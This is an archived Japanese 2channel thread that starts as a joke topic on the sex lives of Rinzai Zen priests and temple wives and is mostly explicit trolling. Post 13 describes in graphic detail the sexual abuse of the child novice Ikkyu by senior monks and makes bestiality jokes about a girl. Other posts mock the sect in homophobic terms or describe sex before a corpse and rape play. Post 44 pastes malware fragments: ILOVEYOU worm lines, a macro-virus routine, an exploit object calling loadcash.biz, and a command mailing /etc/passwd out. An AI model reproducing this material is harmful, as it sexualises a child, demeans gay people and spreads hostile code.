5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★【臨済宗】★愛の営み夫婦生活★【寺庭婦人】★

1 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:28:30
臨済宗の和尚と寺庭の愛の生活を語ろう。
マンネリなんて無関係!

2 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:31:57
2

3 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:51:50
マンネリ解消の必殺技、おしえて。

4 :名無しさん@京都板じゃないよ:2006/07/24(月) 12:07:16
4さま


5 :名無しさん@京都板じゃないよ:2006/07/24(月) 12:52:09
やっぱり君に。
塗れる前になめる。
塗れたらなめない。

6 :名無しさん@京都板じゃないよ:2006/07/24(月) 14:48:42
また臨済関係か

7 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:05:15
季節柄うすぎの嫁をのーぶらにして、挨拶して頭下げたとき、運水産にさりげなくみせる。

8 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:10:03
雲水さんを犯すのは止めて下さいね。

9 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:30:41
白濁液飛び交うオトコとオトコの暑い世界。

10 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:35:44
お尻の穴が痛い。でもやめられない…。愛ゆえにたとえ脱糞しても。

11 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:36:34
お尻の穴が痛くても、温めてまた修行。…臨済宗。

12 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:41:42
男と女だけが愛のカタチじゃないのよ。
オトコとオトコ、デブとデブ、オヤジとオヤジ…糞まみれになっても、ここ臨済宗には本当の愛が息づいている。

13 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:44:34
臨済宗のホモ伝統といえば、今年出版された一休さんの伝記漫画(全5巻・文庫版)で、わざわざ一章分、その話だった。
まだ小僧だった一休さんは、寺に預けられるや否や、兄弟子たちの慰みモノにされて、
生フェラ→口内射精→ゲホッ→吐くな!バカヤロウ!全部飲め!…や、
テコキで、あぁ…一休、いいぞ、いいぞ、いくぞ→ドピュッ→顔面にこびりついたザーメンを泣きながら川で洗う一休…とか、
逆に兄弟子たち数人にオチンチンやカラダ中を舐め回され、不覚にも発射してしまい落ち込む一休…とか、
今日は特別に重要な修行をさせてやると和尚さまに呼び出され、ついに老僧にアヌスのバージンを奪われる一休…とか、
あぁ、現実の「一休さん」っていうか臨済宗はこうだった、否、こうなんだな…って内容がこれでもか!と続いてた。
これをアニメにして放映すればよかったのに。
一休さんに無理矢理チンボーをくわえさせる珍念さん。
その一休さんのカラダを割り裂いて無理矢理闖入する秀念さん。
隣の部屋では崖観和尚が美少年・鉄梅さんを犯し、その頃、金閣寺では将軍さまと新右衛門さんと桔梗屋がオカマ3Pに突入。
皆があ〜う〜ヤってる隙をついて本堂の饅頭を全てたいらげる黙念さん。
寺の外では猫がサヨちゃんにのしかかり、禁断の獣姦ロリプレイが…。
全日本PTA連合会・推薦。臨済宗大本山大徳寺・監修。
…臨済宗って、本当にオゾマシイですね。

14 :名無しさん@京都板じゃないよ:2006/07/24(月) 15:55:08
オレたちにはオレたちのヤリかたがある。
オレたちにはオレたちの愛のカタチがある。
…迫害に負けずにがんばろう!

15 :名無しさん@京都板じゃないよ:2006/07/24(月) 16:05:09
師弟愛、兄弟愛、同性愛こそ、究極の愛の姿。
…誰にも邪魔させない!

16 :名無しさん@京都板じゃないよ:2006/07/24(月) 16:08:19
エイズが怖くて臨済僧なんてやってられるか!…我々は断固として愛を貫くぞ!

17 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:01:46
花大は、宗門の中でも「鼻くそ大学」大学と言われています。
鼻大を出て住職になってもいじめられるだけです。




18 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:18:54
ノンケの連中に問いたい!
おまえは、愛するものの糞を食えるか?!と。
オレたちは愛する彼の糞なら食える! なんのためらいもなく食える!
これがオレたちの愛だ! 男と男の究極の愛のカタチだ!
なにものにも邪魔されないオレたちの権利だ!

19 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:33:11
彼氏の雲水でも、嫁でも、彼女でも、パートナーとの愛を深める、
セックスについて語ろう。

20 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:04:02
パートナーの尻の穴に挿入する。
チンボーには必然的に糞が着いてくる。
その糞を食えるかどうかに、愛の真価が問われる。
オレたち臨済宗僧侶は当然みんなお互いの糞を食える!
真に愛し合ってるからだ!

21 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:16:33
私も、オトコ同士が真の愛の絆=直腸で結ばれた相国僧堂を選びました!!

22 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:49:03
嫁はアナル挿入での糞はなめてくれないが、昔騒動の彼はなめてくれた。

23 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:51:42
行為の時に、きちんとゴムをつけて肛門に挿入する最低限のエチケット…それが守られているAIDSフリーな妙派を選びました。

24 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:07:36
ちんかす、なめあって、やっと禅僧になれる。

25 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:16:54
ホモ対小刻

おもしろくなってきたぞ。

ばかあらそい。




26 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:36:31
臨済宗ってオゾマシイですね。

27 :名無しさん@京都板じゃないよ:2006/07/24(月) 21:08:57
わかった。ホモ行為が臨済各派・各僧堂で日常的に行われていることは認める。だから、これ以上の内情暴露はやめてくれ。
おまえの要求は何だ?
新到の時に僧堂でケツを犯されたのなら、代わりに謝る。
頼む。おまえの要求を提示してくれ。可能なことなら、できるだけのことはする。

28 :名無しさん@京都板じゃないよ:2006/07/24(月) 21:12:49
多くの臨済スレに書いてるけど、何?

29 :名無しさん@京都板じゃないよ:2006/07/24(月) 21:33:12
臨済宗の伝統でもあるんだけど、ホモの先輩に犯された僧侶が、怒って宗派内部のホモの実態を晒してまわってるみたいだね。

30 :名無しさん@京都板じゃないよ:2006/07/24(月) 22:21:47
結局、ホモに始まりホモに終わる。…それが臨済宗の実態というわけだな。

31 :名無しさん@京都板じゃないよ:2006/07/24(月) 22:50:00
つまり寺庭婦人さんたちは、夫の同僚と皆、マラ兄妹…いや、アナ兄弟なのか??

32 :名無しさん@京都板じゃないよ:2006/07/24(月) 23:44:25
【誘導】
乱立する臨済系スレッドを整理します。
ここは重複スレッドです。
連合各派・その他の話題はコチラへ↓

【臨済禅】臨済宗系総合スレッド【連合】第壱巻
http://travel2.2ch.net/test/read.cgi/kyoto/1153751658/

33 :名無しさん@京都板じゃないよ:2006/07/25(火) 10:12:05
僧堂時代に覚えてしまったアナルセックスが忘れられず、
嫁にアナル強要する香具師がおおいとか。


34 :名無しさん@京都板じゃないよ:2006/07/25(火) 15:54:27
小國とホモどうにかしてくれ、、、、

35 :名無しさん@京都板じゃないよ:2006/07/25(火) 18:49:37



まさか今日はホモ爆撃はないやろ。
連日はいくら暇人でも無理やろ。
今日は安心して、すごせるな。




















36 :名無しさん@京都板じゃないよ:2006/07/25(火) 22:14:23
いろいろ言いながらおまえたち、昨晩は昔の熱い思い出に、尻のアナがジンジンうずいて眠れなかったくちだろw
…いいんだ、いいんだ、オレたち臨済僧はそうでなくっちゃ。

37 :名無しさん@京都板じゃないよ:2006/07/26(水) 08:31:34
臨済宗妙心寺派の僧侶は花園大学文学部国際禅学科卒の方が少なからず存在するとの事ですが、
大学進学率が50%を超える現在、「産近甲龍」(関西の中堅私立大学レベル)は卒業していたほうが良いと思われます。
提案ですが「インターネットで授業を受けられる」というメリットを生かして
【早稲田大学 人間科学部 eスクール】(http://e-school.human.waseda.ac.jp/)に入学しては如何でしょうか?
早稲田大学人間科学部の通信教育課程ではありますが、
(無事に卒業すれば)世間的な学歴は「早稲田大学卒」となります。
他大学通信教育課程と比較すると学費等が高額なのがネックの一つですが、
「早稲田大学卒」の圧倒的なブランドの前には大した問題ではないでしょう。
是非ご検討する事を推奨します。それでは用件のみにて失礼します。



38 :名無しさん@京都板じゃないよ:2006/07/27(木) 22:18:30
きょうはしずかやな。ほもの爆撃もきょうはないやろ。
小國もしずかやし。きょうは自分らをほめんやろ。
ちんげ


39 :名無しさん@京都板じゃないよ:2006/07/27(木) 22:21:22
まんげトぱいぱん

40 :名無しさん@京都板じゃないよ:2006/07/27(木) 23:14:55
そろそろ制間ですね(^_^)
僕は暴力禁止・健康第一の相國僧堂に行こうと思います(^_^)

41 :名無しさん@京都板じゃないよ:2006/07/28(金) 11:08:58
志根

42 :名無しさん@京都板じゃないよ:2006/07/29(土) 20:40:34
糞坊主のフルオーケストラやーーーーーーー

43 :名無しさん@京都板じゃないよ:2006/07/29(土) 21:13:21
もう二年も住職と交渉がありません。どうしたらよろしいでしょうか。私がもっと熱心にお寺の事に関わったほうがよいのでしょうか。

44 :名無しさん@京都板じゃないよ:2006/07/29(土) 21:49:01
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"


45 :名無しさん@京都板じゃないよ:2006/07/30(日) 09:26:09
43さんへ
じぶんからすすんで、変わったプレイをしようと誘いなさい。
今までしなかったことを。猥談もいいかも。

46 :43:2006/07/30(日) 17:06:12
具体的にはどういうことをしたり言ったらよいでしょうか?
ちなみに住職は38歳、私は28歳、結婚6年目、子供なしです。

47 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:11:06
剃毛、3P、露出、オナ二相互鑑賞、
特にお互いの羞恥心を無くし乗り越えることが大事。
本堂、境内のプレイなども可。

48 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:13:32
3pの相手選びは難しいから、東京、大阪とかにある、
ハプニングバーなどで、あとくされのない相手を選んで乱交、3pすればいいよ。


49 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:13:46
このページウイルススキャンにかかったよ

50 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:22:06
本堂で釈迦如来像を交えて3P。
これ最高。

51 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:23:56
檀家の通夜の時に遺族には下がってもらって、遺体の前でセックス。コーフンします。

52 :名無しさん@京都板じゃないよ:2006/07/30(日) 17:38:49
僧堂時代の住職の彼氏を使って3Pするのがベスト。何より住職が悦ぶことが一番だし。

53 :名無しさん@京都板じゃないよ:2006/07/30(日) 19:17:43
なるほど。参考になります。

54 :名無しさん@京都板じゃないよ:2006/07/30(日) 19:40:36
家の嫁に高速の便所がなかった時、車止めておしっこさせた。
ドアを開けて外から見えないようにしてあげたけど、
おれがじっくり見てやった。
それまで絶対見せてくれなかったけど、
それ以来、放尿プレイで濡れ濡れに。

55 :43:2006/07/30(日) 19:58:05
53は私じゃありません。プンプン。

56 :名無しさん@京都板じゃないよ:2006/07/30(日) 20:08:15
プンプンプレイですな。プンプン

57 :名無しさん@京都板じゃないよ:2006/07/30(日) 21:10:08
>>54
ハァハァ…オレもまぜてくれ!

58 :南無陀仏:2006/07/30(日) 21:17:26
立たなくなった私にはせめて話でも興奮するよ

59 :名無しさん@京都板じゃないよ:2006/07/30(日) 23:08:24
去年妻に施餓鬼の供え物の苦瓜ととうもろこしを挿入。
結構よかったよ。

あと、デジカメ持参で♪ラブホもいいよ。家ばかりでは面白くないし。
倦怠期も新鮮

60 :名無しさん@京都板じゃないよ:2006/07/30(日) 23:15:19
だよな、デジカメいいよな。
パソコンに入れて、かみさんの前でかみさんの裸写真見てのオナニー
かみさんが興奮してた。それまで、2か月に一回くらいだったのが、
週一くらいに。
やっぱり、セックスは大事なんだな。
新鮮さ保つ努力も必要だな。

61 :名無しさん@京都板じゃないよ:2006/07/30(日) 23:18:27
やめれ、おもしろいけど、
宗門のは自だ。

62 :名無しさん@京都板じゃないよ:2006/07/30(日) 23:20:11
彼女とか、よめさんに、昔の彼氏の話させるのもおもろいで。

63 :名無しさん@京都板じゃないよ:2006/07/30(日) 23:25:58
ノーマルで長続きするほうがめずらしいよ。
みんな言わないだけで、みんな努力してんだよ。


64 :名無しさん@京都板じゃないよ:2006/07/31(月) 14:22:49
よお〜し!!暴力禁止・健康第一の相國僧堂で精進するぞお〜!!

65 :名無しさん@京都板じゃないよ:2006/07/31(月) 16:36:03
時には荒々しく強姦プレイとかも燃えるよな。
あと、オレがやったのは、スゲェ高い線香仕入れた時に、一本一本嫁さんの膣に挿し込んで、愛液が染み渡った頃合いを見計らって抜いて、
その線香を大きな法要の時に焚きまくったこと。
…その夜は嫁さん燃えた。

66 :名無しさん@京都板じゃないよ:2006/07/31(月) 18:00:59
↑くさそー

67 :名無しさん@京都板じゃないよ:2006/07/31(月) 18:05:04
人の嫁さんのあそこの臭いもしらないくせに、
くさそ^とかいうんじゃないぞ。しね

68 :名無しさん@京都板じゃないよ:2006/07/31(月) 18:07:53
うーん、勉強になるなぁ…

69 :名無しさん@京都板じゃないよ:2006/08/01(火) 14:47:03
http://page2.auctions.yahoo.co.jp/jp/auction/b67957035
http://page8.auctions.yahoo.co.jp/jp/auction/h38122034
http://page8.auctions.yahoo.co.jp/jp/auction/h38122102


70 :名無しさん@京都板じゃないよ:2006/08/17(木) 21:56:44
お坊さんてエロいんだねーー。
お盆前に読まなくてよかったお(藁

71 :名無しさん@京都板じゃないよ:2006/08/17(木) 22:32:59
凄いのは嫁を剃髪して法衣を着させて読経させながら後ろからブチ込み凄まじく激しく腰を振り思いっ切り中出しする(^_^)

72 :誘導:2006/08/26(土) 15:13:55
>>1
こちらでどうぞ。

●誘導●
【勝ち組?】坊主と結婚 Part6【負け組?】
http://travel2.2ch.net/test/read.cgi/kyoto/1148665508/

73 :名無しさん@京都板じゃないよ:2006/09/01(金) 21:27:27
住職の嫁さんは跡継ぎがいない場合に住職が無くなった後は寺院から追放されるというのは本当なんですか?

74 :名無しさん@京都板じゃないよ:2006/09/02(土) 06:22:05
私は子供ができる前に旦那が亡くなりました。旦那は住職だったので、私が出家しました。つまり今はそのお寺の住職は私です

75 :名無しさん@京都板じゃないよ:2006/09/02(土) 07:23:59
>>74
貴女は素晴らしい尼僧さんだ!!

76 :名無しさん@京都板じゃないよ:2006/09/02(土) 08:16:30
剃髪してるん?
あそこも?

77 :名無しさん@京都板じゃないよ:2006/09/02(土) 12:43:33
>>65

  その線香、分けて頂けないでしょうか_?
   

78 :74:2006/09/02(土) 17:20:22
もちろん剃髪はしていますよ。

79 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:00:16
>>78
おいくつですか?

80 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:03:10
恥ずかしながらもう32歳です…

81 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:17:23
>>80
いやいや、まだまだこれからですよ。
でも、出家すると性交渉は不可になるのですか?(女性に聞くのは失礼かもしれませんが・・・)

82 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:21:04
宗派によって異なるかもしれませんが、尼僧でも結婚しておられる方がたくさんいらっしゃいます。だから不可能というわけでもありませんが、自分は仏様に仕えている身なのだと思うと私はとてもそんな気にはなれません。

83 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:24:51
えらーい!風俗に通っているどこぞのボーサンに聞かせてやりたいw

84 :名無しさん@京都板じゃないよ:2006/09/02(土) 21:29:43
ありがとうございます。私にもともと与えられた使命は夫が残したこの寺を全力で守るのみです。

85 :名無しさん@京都板じゃないよ:2006/09/07(木) 11:12:09
>>82
えらいー!
不倫ばかりして自分の身が危なくなると相手の女を簡単に捨ててきた、
どこぞのボーサンに聞かせてやりた。
そして、坊主の不倫を責め自分も浮気したあげく、
旦那を振り向かせようと必死にセックスの技を磨きラブホリサーチばっかりしてる、
セックス依存症淫乱嫁にも聞かせてやりたい。

86 :名無しさん@京都板じゃないよ:2006/09/07(木) 21:01:44
栗とリスオナニーを檀那に見せる、寺庭夫人。

87 :名無しさん@京都板じゃないよ:2006/09/22(金) 10:42:51
金閣寺・銀閣寺を末寺に持つ大寺院の相國寺で修行したいと僕は思うのだよ。

88 :名無しさん@京都板じゃないよ:2006/09/22(金) 11:29:05
金閣寺・銀閣寺を末寺に持つ大寺院の相國寺で修行したいと考えるのは
健康な成人男子として当然です。

89 :名無しさん@京都板じゃないよ:2006/09/23(土) 07:36:04
寺もいいけど、管長さんがもっと良い。

90 :名無しさん@京都板じゃないよ:2006/09/25(月) 13:28:33
夢窓国師!!最高!!有馬管長!!最高!!田中老師!!最高!!相國承天禅寺!!最高!!

91 :名無しさん@京都板じゃないよ:2006/10/03(火) 20:26:57
きっきっきっ。みんな騙されるなよ。京叢林は何処も凄まじく厳しいさ。

92 :名無しさん@京都板じゃないよ:2006/10/07(土) 18:27:17
坐禅と見性 四十五章  見性公案
http://life7.2ch.net/test/read.cgi/psy/1158077346/

問う。
『 この場に坐したままで、30メートル先のローソクの炎を吹き消せ。 』
答える。
     ・・・と。


友好スレ
精神世界で癒される第15章
http://life7.2ch.net/test/read.cgi/healing/1156683671/

93 :名無しさん@京都板じゃないよ:2006/10/08(日) 23:39:20
一位 平林寺
二位 正眼寺
三位 妙心寺
四位 徳源寺
五位 臨済寺

94 :名無しさん@京都板じゃないよ:2006/10/09(月) 07:07:36
↑は何のランキング?

95 :名無しさん@京都板じゃないよ:2006/10/09(月) 09:16:16
人気

96 :名無しさん@京都板じゃないよ:2006/10/09(月) 09:21:13
静岡の臨済僧堂って厳しいの?

97 :名無しさん@京都板じゃないよ:2006/10/13(金) 10:05:04
楽だから雲水が多いのではなく老師に魅力が有るからである。

98 :名無しさん@京都板じゃないよ:2006/10/13(金) 17:54:56
楽だ、どうのと言っている>>96おまえがおかしい。


99 :名無しさん@京都板じゃないよ:2006/10/13(金) 17:56:05
ミススマソ
> 楽だ、どうのと言っている>>97おまえがおかしい。



100 :名無しさん@京都板じゃないよ:2006/10/14(土) 16:49:07
試験

檀家の多い僧堂を一位から五位まで述べてよ。

101 :名無しさん@京都板じゃないよ:2006/10/28(土) 23:59:02
立正佼成会員の「すーとら」について議論しよう。

102 :名無しさん@京都板じゃないよ:2006/10/29(日) 00:03:59
この寺も妙尊寺と変わらねえ、カルト左翼教団だなw

 北朝鮮にでも行け!

103 :名無しさん@京都板じゃないよ:2006/11/08(水) 23:48:43
くだらない仕来りに固執する京叢林に未来無し。

104 :名無しさん@京都板じゃないよ:2006/11/17(金) 00:17:54
怨みは怨みによって果たされず、忍を行じてのみ、よく怨みを解くことを得る。これ不変の真理なり。

法句経

105 :名無しさん@京都板じゃないよ:2006/11/29(水) 20:19:14
今夜19:00から京都放送で、映画「雁の寺」が放送されるぜm(__)m

106 :名無しさん@京都板じゃないよ:2007/01/19(金) 19:58:45





住職と寺庭が二人暮しで住職が亡くなった場合は寺庭は寺を出ていかなくてはいけないのでしょうか?m(__)m







107 :名無しさん@京都板じゃないよ :2007/01/19(金) 20:41:13
>>106
あたりまえだろ。散々甘い汁すってんだからよ。次が息子や弟子でない限り、だれも入らない。てら潰すつもりなら、いればいいんだよ。

108 :名無しさん@京都板じゃないよ:2007/01/19(金) 22:01:26
俺のよく知る寺は、住職である旦那が亡くなり、子供も弟子もいなかったため奥さんが出家して継いだけど。

109 :名無しさん@京都板じゃないよ :2007/01/19(金) 22:08:57
一昔前は寺庭にも僧籍とらせて、あき寺ができないようにしたんだって。その後遺症が今でも残っる。
したがっていすわる。
次の住職決まらず。
無住になるという悲しい結末。

110 :名無しさん@京都板じゃないよ:2007/02/16(金) 20:18:41
なるほど

111 :名無しさん@京都板じゃないよ:2007/03/08(木) 18:53:37
なんだこりゃ

112 :名無しさん@京都板じゃないよ:2007/04/02(月) 17:20:27
・・・?

113 :名無しさん@京都板じゃないよ:2007/04/02(月) 18:28:19
65 :名無しさん@京都板じゃないよ :2006/07/31(月) 16:36:03
時には荒々しく強姦プレイとかも燃えるよな。
あと、オレがやったのは、スゲェ高い線香仕入れた時に、一本一本嫁さんの膣に挿し込んで、愛液が染み渡った頃合いを見計らって抜いて、
その線香を大きな法要の時に焚きまくったこと。
…その夜は嫁さん燃えた。


114 :名無しさん@京都板じゃないよ:2007/04/03(火) 17:14:54
109 名前:「嫁」欲しい! :2007/04/03(火) 17:04:14
「嫁」欲しい!
だれか、寺に嫁に来てくれる人紹介してくれ!
42歳(独身) 趣味(鉄道写真) 僧堂歴(3年) 法階(住持職) の副住職です。
寺庭さん見て想像するのも、疲れました。
自分専用の寺庭さんが欲しいです。




22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)